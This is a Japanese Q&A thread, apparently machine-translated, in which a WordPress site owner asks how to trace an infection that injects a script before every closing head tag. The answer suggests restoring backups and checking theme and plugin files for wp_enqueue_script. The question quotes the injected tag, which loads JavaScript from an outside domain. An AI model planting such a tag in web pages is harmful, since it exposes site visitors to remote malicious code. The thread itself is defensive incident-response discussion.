0

私のサーバー上のすべてのインストールのファイルのすべての終了タグの前に、Wordpressプラグインがファイルを書き込んでいる場所で、新しいエクスプロイト/ハックが行われているようです。すべての終了 head タグの前に次のコードを記述しています。.js</head>Wordpress.php

<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>

私の質問は、他のファイルにコードを書き込んでいるファイルを見つけるにはどうすればよいですか? 感染しているサブドメインにいくつかの WP がインストールされていて、どのプラグインから来ているのかわからないため、このようにして、どのプラグインが実行されているかを見つけることができます! ホスティング会社であれ、私であれ、これを監視する方法が必要だと確信しています。

4

1 に答える 1

1

サイトが侵害された場合は、バックアップを復元することをお勧めしますが、バックアップがない場合は、おそらくクリーン インストールを使用することをお勧めします。それでも「修正」したい場合は、スターター、ヘッダーテーマファイル、関数ファイル、およびすべてのプラグインファイルをチェックして、実行するプラグインにエンキューされていないことを確認できるファイルがいくつかあります.

検索する関数が呼び出されますwp_enqueue_script

于 2013-04-15T11:16:35.540 に答える